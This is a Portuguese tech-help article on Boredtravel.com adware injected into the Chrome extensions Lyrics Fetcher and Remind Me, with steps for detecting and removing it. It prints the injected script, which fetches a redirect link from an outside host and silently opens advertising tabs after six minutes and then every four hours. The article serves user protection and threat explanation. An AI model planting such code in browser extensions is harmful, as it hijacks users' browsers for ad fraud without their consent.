Um adware que abre pop-ups no site Boredtravel.com entrou em certas extensões do Chrome. Veja como detectar e remover esse vírus.
Identifique e remova o adware Boredtravel.com
O script malicioso foi inserido na atualização mais recente para várias extensões do Chrome. Esse script abre o site Boredtravel.com sem o conhecimento dos usuários, em intervalos regulares. As extensões infectadas por este script são Lyrics Fetcher e Remind Me, do desenvolvedor helpfulwebtech.
Este adware não é perigoso, pois abre apenas uma página de publicidade. É perturbador, no entanto, deixar essa prática dúbia acontecer.
Identifique o adware
Para identificar o adware, basta analisar o comportamento do seu navegador:
- Feche o Google Chrome e reinicie-o.
- Aguarde 6 minutos depois de abrir o navegador. Se o seu navegador estiver infectado, uma guia será aberta na página boredtravel.com após precisamente 6 minutos. Isso também acontece a cada 4 horas
Remover adware
A remoção é simples e rápida:
- Verifique suas extensões do Chrome: se uma ou mais das extensões listadas acima estiverem instaladas, seu navegador provavelmente está infectado.
- Para remover este adware, basta desativar ou remover as extensões em questão.
Casos foram identificados para extensões Lyrics Fetcher e Lembrar-me, mas eles podem não ser os únicos. É possível que o adware também esteja presente na extensão Modo Bebê, uma extensão do mesmo desenvolvedor.
Não está claro se o desenvolvedor desta extensão adicionou deliberadamente o script mal-intencionado ou se foi feito por um hacker. Como precaução, recomendamos que você desative ou remova todas as extensões deste desenvolvedor.
Extensões foram relatadas ao Google, saberemos mais em breve. Se outras extensões tiverem o mesmo problema, informe-nos.
Substituir extensões
Aqui estão algumas extensões alternativas:
- O Lyrics Fetcher pode ser substituído por Letras Here de Rob W ou Auto Lyric Show
- Lembre-me pode ser substituído por Lembrete de Pi
O trabalho de Boredtravel.com
O princípio é simples: o desenvolvedor ou um hacker adicionou um script nas extensões em questão. Esse script, executado em segundo plano, instrui o navegador a abrir uma página de publicidade em intervalos regulares. O objetivo do desenvolvedor ou hacker é que a página de destino seja aberta um certo número de vezes. Isso aumenta o número de visualizações do site Boredtravel.com e aumenta a renda associada a ele.
Aqui está o código que foi adicionado na extensão. Adicionei comentários em verde, para que você entenda melhor
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
Fontes: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
Leia também: Habilite a autenticação dupla em suas contas online (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
Eu tenho esse problema, mas não vejo nenhuma das extensões que você mencionou.